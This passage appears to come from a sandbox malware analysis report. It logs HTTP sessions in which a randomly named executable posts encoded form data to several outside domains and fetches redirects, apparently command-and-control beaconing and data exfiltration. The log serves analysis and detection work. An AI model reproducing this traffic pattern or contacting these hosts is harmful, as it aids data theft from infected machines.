                                  Host: www.szandraromanovics.hu
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Connection: close
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  May 23, 2024 15:22:06.743333101 CEST  479                IN         HTTP/1.1 404 Not Found
                                  Date: Thu, 23 May 2024 13:22:08 GMT
                                  Server: Apache
                                  Content-Length: 315
                                  Connection: close
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                  Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                  53          192.168.2.6  49759        212.227.172.253  80                3152  C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  Timestamp                             Bytes transferred  Direction  Data
                                  May 23, 2024 15:22:11.829591036 CEST  751                OUT        POST /2oa4/ HTTP/1.1
                                  Host: www.fruitique.co.uk
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 209
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.fruitique.co.uk
                                  Referer: http://www.fruitique.co.uk/2oa4/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Ascii: FNPd=v7CD083vuP2qLGTU+FYdl8W+X521wM5xdd4dv2iyJNMw4t3vUkQsmzE2MXHVP2n3fYzNzxl+fmCIupQ6rNuuiMVE/ip2jUpA83rprz2APBCZmJwulZvH/jsElPHl4eyctVdkbCgCtY9xhsI1/Y2fd6MZMO2F5L36AMAR8NQr7FFsk3z8tY5GuH9YrBE6vc1/EC2Glb9lAunl
                                  May 23, 2024 15:22:12.477113962 CEST  427                IN         HTTP/1.1 301 Moved Permanently
                                  Server: nginx
                                  Date: Thu, 23 May 2024 13:22:12 GMT
                                  Content-Type: text/html
                                  Content-Length: 162
                                  Connection: close
                                  Location: https://www.fruitique.co.uk/2oa4/
                                  Expires: Thu, 23 May 2024 13:42:12 GMT
                                  Cache-Control: max-age=1200
                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                  Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                  54          192.168.2.6  49760        212.227.172.253  80                3152  C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  Timestamp                             Bytes transferred  Direction  Data
                                  May 23, 2024 15:22:14.369345903 CEST  775                OUT        POST /2oa4/ HTTP/1.1
                                  Host: www.fruitique.co.uk
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 233
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.fruitique.co.uk
                                  Referer: http://www.fruitique.co.uk/2oa4/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Ascii: FNPd=v7CD083vuP2qKmPU5iMd0MW9YZ216s59dd0dv3mYcuow5ILvVmoslzE2VnHqL2m5fY3FzwZ+fmWIupg6q+Ghh8VC1ypwnUpA83rprwKuPBaZm4Auk7HAyDsDiPHl8ezbtVdSbCQkte5xhoM1/NCYX6MfGu3PwaGpItZii7Y3kXZKohymxr5l8XdarDcIv81VGCOG3MxCPaCGOLeXACYATCvquGQAPqdgNw==
                                  May 23, 2024 15:22:15.010584116 CEST  427                IN         HTTP/1.1 301 Moved Permanently
                                  Server: nginx
                                  Date: Thu, 23 May 2024 13:22:14 GMT
                                  Content-Type: text/html
                                  Content-Length: 162
                                  Connection: close
                                  Location: https://www.fruitique.co.uk/2oa4/
                                  Expires: Thu, 23 May 2024 13:42:14 GMT
                                  Cache-Control: max-age=1200
                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                  Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                  55          192.168.2.6  49761        212.227.172.253  80                3152  C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  Timestamp                             Bytes transferred  Direction  Data
                                  May 23, 2024 15:22:16.900433064 CEST  1788               OUT        POST /2oa4/ HTTP/1.1
                                  Host: www.fruitique.co.uk
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 1245
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.fruitique.co.uk
                                  Referer: http://www.fruitique.co.uk/2oa4/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  May 23, 2024 15:22:17.539033890 CEST  427                IN         HTTP/1.1 301 Moved Permanently
                                  Server: nginx
                                  Date: Thu, 23 May 2024 13:22:17 GMT
                                  Content-Type: text/html
                                  Content-Length: 162
                                  Connection: close
                                  Location: https://www.fruitique.co.uk/2oa4/
                                  Expires: Thu, 23 May 2024 13:42:17 GMT
                                  Cache-Control: max-age=1200
                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                   56 | 192.168.2.6 | 49762 | 212.227.172.253 | 80 | 3152 | C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                   Timestamp | Bytes transferred | Direction | Data
                                   May 23, 2024 15:22:20.382287025 CEST | 494 | OUT | GET /2oa4/?zdK0d=M8mTZ0xHNd1dPVm&FNPd=i5qj3MbwnaqqZlaCzV8lkcyXWM7z5OtwAvMYuHy+Rs8D5dDCYTlmhW0rahL5OEPHZ4qZwnhHQRjdmYMWg8iT8fZssjRHm0dm/kqluwDPMT77mKIBha7fxwQW4MO+4PevzRBPSWs= HTTP/1.1
                                  Host: www.fruitique.co.uk
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Connection: close
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                   May 23, 2024 15:22:21.060877085 CEST | 591 | IN | HTTP/1.1 301 Moved Permanently
                                  Server: nginx
                                  Date: Thu, 23 May 2024 13:22:20 GMT
                                  Content-Type: text/html
                                  Content-Length: 162
                                  Connection: close
                                  Location: https://www.fruitique.co.uk/2oa4/?zdK0d=M8mTZ0xHNd1dPVm&FNPd=i5qj3MbwnaqqZlaCzV8lkcyXWM7z5OtwAvMYuHy+Rs8D5dDCYTlmhW0rahL5OEPHZ4qZwnhHQRjdmYMWg8iT8fZssjRHm0dm/kqluwDPMT77mKIBha7fxwQW4MO+4PevzRBPSWs=
                                  Expires: Thu, 23 May 2024 13:42:20 GMT
                                  Cache-Control: max-age=1200
                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                   57 | 192.168.2.6 | 49763 | 3.33.130.190 | 80 | 3152 | C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                   Timestamp | Bytes transferred | Direction | Data
                                   May 23, 2024 15:22:26.119154930 CEST | 745 | OUT | POST /klk7/ HTTP/1.1
                                  Host: www.isrninjas.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 209
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.isrninjas.com
                                  Referer: http://www.isrninjas.com/klk7/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Raw: 46 4e 50 64 3d 77 66 6e 55 43 33 79 78 50 66 31 5a 41 61 63 45 67 73 76 73 35 45 68 61 34 76 44 4d 76 37 73 45 5a 43 79 47 4a 58 30 7a 46 49 6a 30 64 39 72 4c 61 59 4b 2f 33 76 71 33 42 38 44 32 65 78 6b 71 76 32 49 32 43 62 53 72 4c 38 78 75 66 47 54 57 6e 49 2b 43 58 4b 63 6a 46 6e 4d 64 48 6d 44 43 49 63 4f 43 38 49 5a 79 52 41 57 35 57 59 76 33 71 38 70 4e 55 67 62 49 64 45 38 47 42 34 46 2f 4f 57 46 62 38 47 32 64 46 63 2f 63 30 6a 73 4f 71 6d 43 41 2b 2b 77 2b 6d 6b 4d 78 32 75 63 39 78 48 71 57 2f 57 50 35 79 33 58 7a 76 62 38 71 50 39 75 5a 4f 42 31 6b 51 5a 63 32 39 78 68 75 34 71 48 79 56 50 7a 2b 35 42 4c 51
                                  Data Ascii: FNPd=wfnUC3yxPf1ZAacEgsvs5Eha4vDMv7sEZCyGJX0zFIj0d9rLaYK/3vq3B8D2exkqv2I2CbSrL8xufGTWnI+CXKcjFnMdHmDCIcOC8IZyRAW5WYv3q8pNUgbIdE8GB4F/OWFb8G2dFc/c0jsOqmCA++w+mkMx2uc9xHqW/WP5y3Xzvb8qP9uZOB1kQZc29xhu4qHyVPz+5BLQ


                                   Session ID | Source IP | Source Port | Destination IP | Destination Port
                                   58 | 192.168.2.6 | 49764 | 3.33.130.190 | 80
                                   Timestamp | Bytes transferred | Direction | Data
                                   May 23, 2024 15:22:29.725642920 CEST | 769 | OUT | POST /klk7/ HTTP/1.1
                                  Host: www.isrninjas.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 233
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.isrninjas.com
                                  Referer: http://www.isrninjas.com/klk7/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Raw: 46 4e 50 64 3d 77 66 6e 55 43 33 79 78 50 66 31 5a 41 36 4d 45 6c 4c 62 73 31 30 68 5a 6b 2f 44 4d 30 72 73 49 5a 43 2b 47 4a 58 64 6f 46 39 37 30 64 63 62 4c 62 5a 4b 2f 36 50 71 33 5a 73 44 33 47 52 6c 6d 76 32 46 56 43 5a 57 72 4c 38 31 75 66 45 37 57 6e 2f 4b 42 52 4b 63 68 63 33 4d 66 4b 47 44 43 49 63 4f 43 38 49 4e 55 52 41 4f 35 56 6f 66 33 72 65 52 4f 4c 51 62 4c 61 45 38 47 46 34 46 37 4f 57 45 4f 38 48 71 37 46 66 48 63 30 69 63 4f 71 33 43 50 70 75 77 38 34 55 4e 6b 77 4e 4e 59 33 6b 6a 57 78 58 37 62 71 48 58 44 6e 4e 39 77 54 4f 75 36 63 52 56 6d 51 62 45 45 39 52 68 45 36 71 2f 79 48 59 2f 5a 32 31 75 7a 42 57 44 79 36 73 32 47 6f 69 50 55 45 65 55 6b 68 74 51 61 2b 51 3d 3d
                                  Data Ascii: FNPd=wfnUC3yxPf1ZA6MElLbs10hZk/DM0rsIZC+GJXdoF970dcbLbZK/6Pq3ZsD3GRlmv2FVCZWrL81ufE7Wn/KBRKchc3MfKGDCIcOC8INURAO5Vof3reROLQbLaE8GF4F7OWEO8Hq7FfHc0icOq3CPpuw84UNkwNNY3kjWxX7bqHXDnN9wTOu6cRVmQbEE9RhE6q/yHY/Z21uzBWDy6s2GoiPUEeUkhtQa+Q==


                                   Session ID | Source IP | Source Port | Destination IP | Destination Port
                                   59 | 192.168.2.6 | 49765 | 3.33.130.190 | 80
                                   Timestamp | Bytes transferred | Direction | Data
                                   May 23, 2024 15:22:32.260241985 CEST | 1782 | OUT | POST /klk7/ HTTP/1.1
                                  Host: www.isrninjas.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 1245
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.isrninjas.com
                                  Referer: http://www.isrninjas.com/klk7/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Raw: 46 4e 50 64 3d 77 66 6e 55 43 33 79 78 50 66 31 5a 41 36 4d 45 6c 4c 62 73 31 30 68 5a 6b 2f 44 4d 30 72 73 49 5a 43 2b 47 4a 58 64 6f 46 39 7a 30 64 4f 6a 4c 55 61 69 2f 37 50 71 33 48 38 44 79 47 52 6c 72 76 31 31 4a 43 5a 61 37 4c 2b 39 75 66 6e 44 57 68 4f 4b 42 43 71 63 68 42 6e 4d 53 48 6d 43 57 49 64 2b 47 38 49 64 55 52 41 4f 35 56 72 48 33 72 4d 70 4f 51 51 62 49 64 45 38 4b 42 34 46 66 4f 57 4d 65 38 45 47 4e 51 2b 6e 63 36 69 4d 4f 6d 6c 61 50 71 4f 77 45 35 55 4d 6e 77 4e 42 4c 33 6b 50 77 78 58 50 39 71 41 58 44 78 73 49 78 43 2b 53 77 4b 69 35 78 4f 4b 77 50 2b 57 70 59 79 37 7a 70 47 4b 44 6d 2f 46 65 65 5a 32 7a 34 35 75 33 71 70 41 75 37 48 5a 6c 73 6e 59 35 54 74 4a 4d 61 45 4f 57 53 64 73 47 5a 6c 54 54 2f 6a 46 44 49 51 43 53 30 74 43 66 79 2f 2f 42 49 61 75 79 5a 46 64 4f 59 77 72 50 63 38 54 4f 70 50 4c 4d 74 31 6a 74 7a 50 67 5a 4d 37 78 77 47 58 6a 56 51 6d 61 4b 36 47 45 63 4f 49 48 34 31 6d 71 30 39 47 41 36 44 44 30 5a 43 63 58 6f 36 65 6c 37 54 62 2b 47 2f 6c 51 66 5a 37 [TRUNCATED]
                                   Data Ascii: FNPd=wfnUC3yxPf1ZA6MElLbs10hZk/DM0rsIZC+GJXdoF9z0dOjLUai/7Pq3H8DyGRlrv11JCZa7L+9ufnDWhOKBCqchBnMSHmCWId+G8IdURAO5VrH3rMpOQQbIdE8KB4FfOWMe8EGNQ+nc6iMOmlaPqOwE5UMnwNBL3kPwxXP9qAXDxsIxC+SwKi5xOKwP+WpYy7zpGKDm/FeeZ2z45u3qpAu7HZlsnY5TtJMaEOWSdsGZlTT/jFDIQCS0tCfy//BIauyZFdOYwrPc8TOpPLMt1jtzPgZM7xwGXjVQmaK6GEcOIH41mq09GA6DD0ZCcXo6el7Tb+G/lQfZ7 [TRUNCATED]


                                   Session ID | Source IP | Source Port | Destination IP | Destination Port
                                   60 | 192.168.2.6 | 49766 | 3.33.130.190 | 80
                                   Timestamp | Bytes transferred | Direction | Data
                                   May 23, 2024 15:22:34.789547920 CEST | 492 | OUT | GET /klk7/?FNPd=9dP0BDeQOeIgUtwHisb4+HhriuuC7aFbTiKeAEdqL4fJM7qIcfT3xserNr/6IBhXmDc0Se+gIKMrWWn6otGBJpYMdUchDVG2Mcac25kobj2gW5aJo9JvfS7IA0chOZVsE0AwxR4=&zdK0d=M8mTZ0xHNd1dPVm HTTP/1.1
                                  Host: www.isrninjas.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Connection: close
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                   May 23, 2024 15:22:35.285506964 CEST | 418 | IN | HTTP/1.1 200 OK
                                  Server: openresty
                                  Date: Thu, 23 May 2024 13:22:35 GMT
                                  Content-Type: text/html
                                  Content-Length: 278
                                  Connection: close
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 46 4e 50 64 3d 39 64 50 30 42 44 65 51 4f 65 49 67 55 74 77 48 69 73 62 34 2b 48 68 72 69 75 75 43 37 61 46 62 54 69 4b 65 41 45 64 71 4c 34 66 4a 4d 37 71 49 63 66 54 33 78 73 65 72 4e 72 2f 36 49 42 68 58 6d 44 63 30 53 65 2b 67 49 4b 4d 72 57 57 6e 36 6f 74 47 42 4a 70 59 4d 64 55 63 68 44 56 47 32 4d 63 61 63 32 35 6b 6f 62 6a 32 67 57 35 61 4a 6f 39 4a 76 66 53 37 49 41 30 63 68 4f 5a 56 73 45 30 41 77 78 52 34 3d 26 7a 64 4b 30 64 3d 4d 38 6d 54 5a 30 78 48 4e 64 31 64 50 56 6d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?FNPd=9dP0BDeQOeIgUtwHisb4+HhriuuC7aFbTiKeAEdqL4fJM7qIcfT3xserNr/6IBhXmDc0Se+gIKMrWWn6otGBJpYMdUchDVG2Mcac25kobj2gW5aJo9JvfS7IA0chOZVsE0AwxR4=&zdK0d=M8mTZ0xHNd1dPVm"}</script></head></html>


                                   Session ID | Source IP | Source Port | Destination IP | Destination Port
                                   61 | 192.168.2.6 | 49767 | 69.57.162.24 | 80
                                   Timestamp | Bytes transferred | Direction | Data
                                   May 23, 2024 15:22:43.353050947 CEST | 500 | OUT | GET /88o1/?FNPd=6H0XwdryOyxEld2In19mTcPbDWu4JiPerPnhtxRIRMEZrjEQVkxwg3m1x0TM7/jCK+5wA6bK2pnso5xUF2TOd/2As6zlvvV262DB5DqMTNUdTxWj14lc65WjVUDEbYoF5Wnps5M=&zdK0d=M8mTZ0xHNd1dPVm HTTP/1.1
                                  Host: www.emgeecontracting.shop
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Connection: close
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                   May 23, 2024 15:22:43.935703039 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                  keep-alive: timeout=5, max=100
                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                  pragma: no-cache
                                  content-type: text/html
                                  content-length: 1251
                                  date: Thu, 23 May 2024 13:22:43 GMT
                                  server: LiteSpeed
                                  x-turbo-charged-by: LiteSpeed
                                  connection: close
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-col
                                   May 23, 2024 15:22:43.940427065 CEST | 316 | IN | Data Raw: 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35
                                  Data Ascii: or:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such,


                                   Session ID | Source IP | Source Port | Destination IP | Destination Port
                                   62 | 192.168.2.6 | 49768 | 162.240.81.188 | 80
                                   Timestamp | Bytes transferred | Direction | Data
                                   May 23, 2024 15:22:48.963737965 CEST | 754 | OUT | POST /x98j/ HTTP/1.1
                                  Host: www.upshercode.store
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 209
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.upshercode.store
                                  Referer: http://www.upshercode.store/x98j/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Raw: 46 4e 50 64 3d 6e 68 5a 35 4a 31 68 63 49 48 72 4b 59 63 6e 43 69 64 73 53 6c 50 4e 31 68 46 6e 64 39 34 6f 57 59 54 71 34 78 58 2f 78 34 55 5a 43 6b 6f 2f 37 38 6d 72 33 49 6f 2b 56 73 63 6e 35 62 62 46 69 54 43 77 39 38 54 39 67 55 34 78 55 42 2b 45 37 79 71 4d 34 51 56 73 4a 4d 76 62 74 2b 30 45 35 79 6e 49 77 38 63 43 51 35 68 77 6f 63 6e 6b 61 39 53 53 41 6b 6a 6e 45 54 77 56 32 7a 52 77 4f 4d 47 67 57 41 63 73 35 51 33 74 6a 38 61 4d 2b 78 5a 6e 35 4c 6f 52 4a 78 67 41 6c 58 61 47 45 31 4d 59 34 62 56 71 4d 6e 53 72 49 43 46 41 34 57 72 33 34 67 72 6d 39 77 4b 42 44 6b 77 68 77 76 69 55 31 7a 4e 6e 4b 72 62 4b 42
                                  Data Ascii: FNPd=nhZ5J1hcIHrKYcnCidsSlPN1hFnd94oWYTq4xX/x4UZCko/78mr3Io+Vscn5bbFiTCw98T9gU4xUB+E7yqM4QVsJMvbt+0E5ynIw8cCQ5hwocnka9SSAkjnETwV2zRwOMGgWAcs5Q3tj8aM+xZn5LoRJxgAlXaGE1MY4bVqMnSrICFA4Wr34grm9wKBDkwhwviU1zNnKrbKB
                                   May 23, 2024 15:22:49.568794012 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                  Server: nginx/1.20.1
                                  Date: Thu, 23 May 2024 13:22:49 GMT
                                  Content-Type: text/html
                                  Content-Length: 3650
                                  Connection: close
                                  ETag: "636d2d22-e42"
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
